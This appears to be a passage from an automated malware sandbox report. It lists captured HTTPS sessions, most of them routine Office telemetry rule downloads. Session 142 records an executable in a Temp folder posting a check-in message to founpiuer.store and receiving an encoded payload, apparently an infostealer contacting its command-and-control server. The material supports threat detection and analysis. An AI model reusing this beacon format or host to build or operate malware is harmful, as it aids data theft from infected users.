2024-11-05 17:46:24 UTC	1372	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	49885	104.21.5.155	443	7788	C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:24 UTC	352	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=ZLCpBdYC7CSLSwdeJm_F41_inyCtte1.Hz7jIm_y__4-1730828783-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: founpiuer.store
2024-11-05 17:46:24 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-11-05 17:46:25 UTC	1014	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d71igseav9m8j6bc72blt0fpdo; expires=Sat, 01-Mar-2025 11:33:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmsTTDpdBrQw%2FGXvvU8C8SHN6l1vRb9kJG02YqPvDgkTNpNKDn47GR3kWz1w0z2hw4BAvuyjNfOD5%2FRTcS%2B27oEo%2BAZVHUi5EOxat4QByE4Wc8Z3ilQocK2ag%2FpIW2krisE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddea9bf793f51f4-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19218&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1040&delivery_rate=150935&cwnd=32&unsent_bytes=0&cid=6364005478d1c9ba&ts=1054&x=0"
2024-11-05 17:46:25 UTC	355	IN	Data Raw: 34 34 36 63 0d 0a 48 56 69 72 7a 66 31 70 39 61 54 6b 6c 72 63 47 37 57 69 35 36 57 6e 4c 77 67 2b 50 69 33 52 2f 62 57 4b 69 39 66 75 49 51 42 6c 6d 65 74 33 76 78 31 33 5a 68 70 66 7a 6c 54 79 5a 47 73 79 4d 52 65 6d 6a 61 36 32 78 45 68 34 42 45 63 66 5a 32 66 34 74 4f 79 63 2b 79 71 47 4f 44 4e 6d 47 67 65 36 56 50 4c 59 54 6d 34 77 48 36 66 67 74 36 75 45 57 48 67 45 41 77 35 36 55 2b 43 78 36 64 54 54 4d 70 5a 67 4b 6b 63 57 49 2b 39 4a 6a 69 41 6e 54 68 77 43 6d 71 6d 4b 74 70 31 59 61 46 30 43 59 31 37 62 74 4e 48 68 51 4f 64 69 6d 33 78 54 5a 33 38 62 7a 32 53 54 58 53 74 69 4d 43 36 65 6b 61 2b 54 6a 48 42 63 4a 41 63 61 66 69 2b 45 6d 63 58 55 36 7a 36 53 53 41 34 58 49 67 76 7a 5a 5a 59 49 4a 6d 38 56 4c 72 72 67 74 74 61 6c 46 4c 77 77 52 30 Data Ascii: 446cHVirzf1p9aTklrcG7Wi56WnLwg+Pi3R/bWKi9fuIQBlmet3vx13ZhpfzlTyZGsyMRemja62xEh4BEcfZ2f4tOyc+yqGODNmGge6VPLYTm4wH6fgt6uEWHgEAw56U+Cx6dTTMpZgKkcWI+9JjiAnThwCmqmKtp1YaF0CY17btNHhQOdim3xTZ38bz2STXStiMC6eka+TjHBcJAcafi+EmcXU6z6SSA4XIgvzZZYIJm8VLrrgttalFLwwR0
2024-11-05 17:46:25 UTC	1369	IN	Data Raw: 70 66 55 6a 76 2f 65 59 5a 30 42 30 6f 59 47 71 61 31 6e 34 75 6f 57 47 67 55 4b 7a 35 32 64 35 79 39 39 66 7a 71 4a 34 64 38 4d 6a 34 62 65 74 50 5a 68 6e 77 33 58 6e 55 6d 54 34 48 4b 6a 38 46 59 61 41 30 43 59 31 35 48 76 49 58 68 30 4e 63 71 6e 6c 42 6d 58 31 49 44 35 30 48 61 4a 44 39 57 42 43 4c 75 71 59 2b 76 71 48 78 59 47 42 63 65 54 32 61 52 69 66 47 64 36 6b 65 2b 2b 42 70 7a 4b 6a 4f 50 56 4a 4a 42 45 77 73 73 4d 70 65 41 31 72 65 30 58 47 51 34 45 7a 70 6d 64 35 69 52 31 63 6a 58 50 70 5a 38 4d 6e 63 36 4f 39 64 68 76 67 41 72 65 68 67 2b 76 72 47 7a 6f 71 56 68 64 43 42 69 41 7a 39 6e 45 4a 58 68 74 65 50 79 73 6b 51 57 51 30 4d 62 72 6d 33 33 50 44 64 66 4c 55 2b 6d 75 61 4f 4c 37 46 77 38 4b 44 74 4b 62 6e 4f 77 76 65 48 45 36 7a 4b 69 53 Data Ascii: pfUjv/eYZ0B0oYGqa1n4uoWGgUKz52d5y99fzqJ4d8Mj4betPZhnw3XnUmT4HKj8FYaA0CY15HvIXh0NcqnlBmX1ID50HaJD9WBCLuqY+vqHxYGBceT2aRifGd6ke++BpzKjOPVJJBEwssMpeA1re0XGQ4Ezpmd5iR1cjXPpZ8Mnc6O9dhvgArehg+vrGzoqVhdCBiAz9nEJXhtePyskQWQ0Mbrm33PDdfLU+muaOL7Fw8KDtKbnOwveHE6zKiS
2024-11-05 17:46:25 UTC	1369	IN	Data Raw: 62 72 6d 33 33 50 44 64 66 4c 55 2b 6d 73 5a 4f 33 69 48 42 6b 50 42 38 32 53 6d 75 30 68 64 6e 67 77 78 36 69 62 42 35 37 4c 67 50 54 53 59 49 6f 59 33 6f 49 48 70 65 41 6a 72 65 34 4f 58 56 64 41 37 35 43 50 36 51 31 34 62 6a 4f 4a 73 4e 45 53 31 38 47 4b 74 49 30 6b 69 41 2f 54 67 41 32 68 6f 48 2f 6f 35 78 30 63 42 51 62 42 6d 70 58 73 49 6e 70 2f 50 4d 57 76 6d 41 79 46 31 49 50 79 78 32 37 50 52 4a 75 4d 45 2b 6e 34 4c 64 76 35 41 51 77 5a 51 76 57 55 6c 2b 51 6c 62 54 38 6c 68 37 62 66 44 4a 75 47 33 72 54 65 5a 49 4d 4e 30 34 30 50 6f 61 39 69 35 50 73 58 45 51 45 53 78 35 65 51 35 43 31 33 64 6a 66 4f 6f 70 51 42 6d 73 4b 42 39 5a 55 71 7a 77 33 44 79 31 50 70 6c 6e 33 67 35 54 67 57 41 77 6d 41 69 4e 66 7a 59 6e 78 7a 65 70 48 76 6d 77 65 66 7a Data Ascii: brm33PDdfLU+msZO3iHBkPB82Smu0hdngwx6ibB57LgPTSYIoY3oIHpeAjre4OXVdA75CP6Q14bjOJsNES18GKtI0kiA/TgA2hoH/o5x0cBQbBmpXsInp/PMWvmAyF1IPyx27PRJuME+n4Ldv5AQwZQvWUl+QlbT8lh7bfDJuG3rTeZIMN040Poa9i5PsXEQESx5eQ5C13djfOopQBmsKB9ZUqzw3Dy1Ppln3g5TgWAwmAiNfzYnxzepHvmwefz
2024-11-05 17:46:25 UTC	1369	IN	Data Raw: 68 69 77 33 66 6a 51 54 70 37 69 33 71 38 56 5a 46 54 79 2f 6e 6f 74 76 4c 47 44 74 67 64 4e 44 76 6d 41 66 58 6e 73 62 34 31 6d 69 48 42 64 32 43 42 36 4f 70 5a 75 48 69 45 68 45 47 42 63 61 57 6e 4f 38 6a 66 33 4d 77 7a 36 79 63 42 4a 6a 4a 6a 72 53 62 4a 49 67 53 6d 39 4e 4c 6a 4c 64 6d 34 2b 39 57 41 6b 45 5a 67 4a 43 56 71 6e 6f 37 63 7a 50 50 71 5a 6f 48 6c 73 43 4f 38 64 31 67 6a 67 7a 64 69 41 53 74 70 57 7a 69 37 52 6f 54 42 51 48 42 6d 35 4c 6c 4b 58 34 2f 64 49 6d 6f 68 30 76 50 68 72 66 33 77 33 4f 66 42 70 75 55 52 62 44 67 61 75 47 70 54 6c 30 4f 45 73 71 64 6c 2b 38 74 66 6e 77 31 7a 71 4b 5a 42 35 33 50 6a 76 4c 61 62 5a 30 4a 31 34 55 4d 70 36 78 6a 34 4f 4d 56 45 45 39 4f 67 4a 43 42 71 6e 6f 37 55 7a 33 45 67 5a 51 48 6b 49 61 5a 75 73 Data Ascii: hiw3fjQTp7i3q8VZFTy/notvLGDtgdNDvmAfXnsb41miHBd2CB6OpZuHiEhEGBcaWnO8jf3Mwz6ycBJjJjrSbJIgSm9NLjLdm4+9WAkEZgJCVqno7czPPqZoHlsCO8d1gjgzdiAStpWzi7RoTBQHBm5LlKX4/dImoh0vPhrf3w3OfBpuURbDgauGpTl0OEsqdl+8tfnw1zqKZB53PjvLabZ0J14UMp6xj4OMVEE9OgJCBqno7Uz3EgZQHkIaZus
2024-11-05 17:46:25 UTC	1369	IN	Data Raw: 33 4a 4e 4c 38 65 42 62 36 76 6b 47 48 6b 30 78 31 70 53 50 34 53 39 33 50 79 57 48 74 74 38 4d 6d 34 62 65 74 4e 4e 72 68 67 6e 55 69 67 4b 6c 72 57 6a 6b 37 42 63 62 43 77 72 4b 6c 35 2f 73 49 33 35 31 4f 63 69 6c 6c 67 79 66 77 59 58 6d 6c 53 72 50 44 63 50 4c 55 2b 6d 4a 61 76 2f 6e 42 6c 30 51 54 74 6e 58 6e 75 5a 69 49 7a 38 2b 77 36 43 62 44 4a 76 41 67 2f 4c 59 5a 59 41 4c 32 34 51 50 6f 71 6c 72 37 4f 51 54 45 41 73 53 79 70 79 57 35 69 74 33 63 6e 71 48 37 35 67 54 31 35 37 47 78 64 68 71 67 51 33 4e 79 78 54 6e 75 53 33 71 35 56 5a 46 54 77 48 4d 6d 4a 72 6c 49 58 68 2b 4d 4e 75 39 6b 77 4b 66 77 34 72 2f 32 32 4b 64 44 4e 53 43 43 4b 71 70 61 75 58 6c 48 42 34 49 51 49 37 58 6e 76 4a 69 49 7a 38 5a 33 72 2b 53 53 34 69 49 6e 37 54 53 61 4d 39 Data Ascii: 3JNL8eBb6vkGHk0x1pSP4S93PyWHtt8Mm4betNNrhgnUigKlrWjk7BcbCwrKl5/sI351OcillgyfwYXmlSrPDcPLU+mJav/nBl0QTtnXnuZiIz8+w6CbDJvAg/LYZYAL24QPoqlr7OQTEAsSypyW5it3cnqH75gT157GxdhqgQ3NyxTnuS3q5VZFTwHMmJrlIXh+MNu9kwKfw4r/22KdDNSCCKqpauXlHB4IQI7XnvJiIz8Z3r+SS4iIn7TSaM9
2024-11-05 17:46:25 UTC	1369	IN	Data Raw: 61 79 6d 59 75 4c 67 48 78 6b 48 41 38 43 54 6e 65 30 6e 65 48 4d 78 7a 71 79 51 44 35 37 49 6a 2f 75 56 4b 73 38 4e 77 38 74 54 36 59 46 32 37 75 55 62 58 52 42 4f 32 64 65 65 35 6d 49 6a 50 7a 62 48 71 70 38 42 6b 63 4b 44 38 74 39 68 6a 77 48 59 68 41 2b 76 70 47 4c 74 34 68 38 63 43 51 58 4b 6e 4a 2f 6e 49 58 31 35 65 6f 66 76 6d 42 50 58 6e 73 62 55 7a 6d 6d 44 44 5a 75 55 52 62 44 67 61 75 47 70 54 6c 30 45 44 4d 53 51 6d 65 63 68 63 33 6f 2b 77 36 71 66 41 34 58 4f 68 76 50 48 64 6f 38 44 33 6f 63 49 71 61 52 72 35 4f 38 56 47 55 39 4f 67 4a 43 42 71 6e 6f 37 55 6a 62 4f 68 70 67 51 31 39 6e 49 37 5a 56 6a 67 30 71 44 79 77 71 69 71 6d 4c 67 36 68 41 65 42 41 58 4b 6c 70 37 69 4c 32 6c 38 4e 63 61 72 6e 77 53 52 77 49 66 37 30 32 4f 47 43 39 4f 4d Data Ascii: aymYuLgHxkHA8CTne0neHMxzqyQD57Ij/uVKs8Nw8tT6YF27uUbXRBO2dee5mIjPzbHqp8BkcKD8t9hjwHYhA+vpGLt4h8cCQXKnJ/nIX15eofvmBPXnsbUzmmDDZuURbDgauGpTl0EDMSQmechc3o+w6qfA4XOhvPHdo8D3ocIqaRr5O8VGU9OgJCBqno7UjbOhpgQ19nI7ZVjg0qDywqiqmLg6hAeBAXKlp7iL2l8NcarnwSRwIf702OGC9OM
2024-11-05 17:46:25 UTC	1369	IN	Data Raw: 50 4b 2f 78 77 61 48 77 66 58 6d 4e 6d 6b 59 6e 51 2f 59 76 44 76 6c 67 79 4d 31 35 44 35 78 57 50 50 4e 5a 58 4c 45 2b 6e 34 4c 64 6a 71 47 42 4d 49 46 74 48 61 76 76 77 6f 66 47 38 39 33 71 44 66 52 64 66 41 78 71 79 47 4b 73 38 4f 79 73 74 54 2b 66 49 32 75 4c 70 42 54 56 30 66 6a 6f 37 5a 2f 47 49 6a 4c 58 53 4a 76 64 39 54 31 34 47 46 35 73 64 69 6a 42 7a 59 7a 44 57 58 68 33 66 67 37 77 45 4d 4d 54 37 48 6a 5a 54 73 4e 57 6f 7a 4c 38 71 68 6b 51 79 42 68 73 69 30 32 69 54 58 4d 35 76 44 53 35 62 75 4c 66 57 70 54 6c 30 36 41 38 36 5a 6e 76 77 7a 4e 6c 67 67 78 4b 6d 49 47 74 65 49 78 76 4b 56 50 4e 39 45 6d 34 38 61 36 66 67 39 76 37 4a 44 54 6c 68 51 6b 6f 6a 58 38 32 4a 74 50 32 4b 62 34 64 38 5a 31 35 37 47 73 39 5a 32 6e 51 7a 59 6e 51 6a 75 6e Data Ascii: PK/xwaHwfXmNmkYnQ/YvDvlgyM15D5xWPPNZXLE+n4LdjqGBMIFtHavvwofG893qDfRdfAxqyGKs8OystT+fI2uLpBTV0fjo7Z/GIjLXSJvd9T14GF5sdijBzYzDWXh3fg7wEMMT7HjZTsNWozL8qhkQyBhsi02iTXM5vDS5buLfWpTl06A86ZnvwzNlggxKmIGteIxvKVPN9Em48a6fg9v7JDTlhQkojX82JtP2Kb4d8Z157Gs9Z2nQzYnQjun
2024-11-05 17:46:25 UTC	1369	IN	Data Raw: 57 4b 41 77 4f 7a 70 43 50 2b 32 39 63 63 54 33 49 75 59 38 63 6d 49 62 49 74 4e 4d 6b 31 31 69 56 79 77 2b 34 34 44 57 39 75 30 31 49 58 46 65 51 78 59 61 6b 4f 7a 74 70 65 70 48 39 30 55 75 46 68 74 36 30 6b 6d 65 64 47 4e 32 49 48 61 72 6e 55 39 50 4f 47 42 6f 4f 46 74 43 41 6c 71 55 4d 54 56 34 45 39 37 71 63 42 5a 6e 42 6b 4f 57 56 4b 73 38 46 6d 39 4d 79 36 65 67 74 30 71 64 57 42 55 39 59 67 4b 4b 61 35 43 78 38 61 53 75 45 69 4a 45 4d 6c 74 43 57 34 39 6f 72 6f 54 7a 36 79 30 58 70 70 69 32 31 75 31 68 64 43 78 47 41 7a 38 6d 34 65 53 34 73 62 5a 6e 39 67 45 57 4f 68 70 43 30 6a 54 62 42 53 73 6e 4c 55 2b 6e 6e 62 76 2f 37 45 42 34 5a 41 34 65 70 70 38 30 73 66 48 34 73 32 61 4b 54 4b 70 54 58 6a 4d 72 72 63 59 77 45 31 59 77 64 75 4f 41 6a 72 65 Data Ascii: WKAwOzpCP+29ccT3IuY8cmIbItNMk11iVyw+44DW9u01IXFeQxYakOztpepH90UuFht60kmedGN2IHarnU9POGBoOFtCAlqUMTV4E97qcBZnBkOWVKs8Fm9My6egt0qdWBU9YgKKa5Cx8aSuEiJEMltCW49oroTz6y0Xppi21u1hdCxGAz8m4eS4sbZn9gEWOhpC0jTbBSsnLU+nnbv/7EB4ZA4epp80sfH4s2aKTKpTXjMrrcYwE1YwduOAjre
2024-11-05 17:46:25 UTC	1369	IN	Data Raw: 46 74 57 55 69 65 30 63 52 56 49 6f 7a 72 2b 63 53 62 76 42 69 2f 6a 72 57 72 67 62 33 4a 74 4a 6a 36 4e 37 37 71 6c 59 58 52 64 41 6d 4e 65 30 2b 43 56 72 66 48 6a 6c 71 4a 49 48 31 39 6e 49 37 5a 56 79 7a 31 4b 49 78 55 75 37 34 44 57 74 72 68 55 50 48 51 62 44 67 5a 71 74 48 45 56 53 4b 4d 36 2f 6e 45 6d 6d 79 34 4c 69 77 47 65 66 44 65 57 31 4a 72 75 6e 66 65 36 72 4d 79 64 4e 4d 64 61 55 6d 65 51 6c 4f 7a 46 36 30 65 2f 48 53 37 72 55 67 65 54 57 4a 71 6f 77 6d 62 6f 64 71 71 42 6a 36 71 6b 4a 55 78 5a 41 31 74 66 42 75 57 77 37 62 58 71 52 37 39 67 46 6d 73 65 46 2b 74 5a 32 6e 51 7a 59 6e 51 6a 75 6e 6c 50 43 34 68 63 4e 41 68 48 4e 6b 34 2f 55 48 46 78 35 50 38 36 52 6f 54 79 47 77 5a 61 32 38 32 65 5a 43 5a 76 46 53 37 48 67 4e 61 33 4f 45 42 67 Data Ascii: FtWUie0cRVIozr+cSbvBi/jrWrgb3JtJj6N77qlYXRdAmNe0+CVrfHjlqJIH19nI7ZVyz1KIxUu74DWtrhUPHQbDgZqtHEVSKM6/nEmmy4LiwGefDeW1Jrunfe6rMydNMdaUmeQlOzF60e/HS7rUgeTWJqowmbodqqBj6qkJUxZA1tfBuWw7bXqR79gFmseF+tZ2nQzYnQjunlPC4hcNAhHNk4/UHFx5P86RoTyGwZa282eZCZvFS7HgNa3OEBg

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	49886	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:24 UTC	192	OUT	GET /rules/rule700901v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:24 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:24 GMT Content-Type: text/xml Content-Length: 1408 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1038EF2" x-ms-request-id: 295439a2-001e-0065-3ad2-2c0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174624Z-16547b76f7fm7xw6hC1DFW5px400000005d000000000bwg5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:24 UTC	1408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	49887	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:25 UTC	192	OUT	GET /rules/rule700900v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:25 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:25 GMT Content-Type: text/xml Content-Length: 1371 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT ETag: "0x8DC582BED3D048D" x-ms-request-id: 5a9e749e-101e-000b-39d2-2c5e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174625Z-16547b76f7fp46ndhC1DFW66zg00000005hg000000009cx1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:25 UTC	1371	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49888	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:25 UTC	192	OUT	GET /rules/rule702251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:25 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:25 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE0F427E7" x-ms-request-id: 26ee9f20-901e-0048-4509-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174625Z-15869dbbcc6tjwwhhC1DFWt1ns00000005mg000000001h4f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:25 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49889	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:25 UTC	192	OUT	GET /rules/rule702250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:25 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:25 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDD0A87E5" x-ms-request-id: 4af388a5-701e-000d-244e-2e6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174625Z-15869dbbcc6j87jfhC1DFWky3s00000005fg00000000chmd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:25 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49890	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
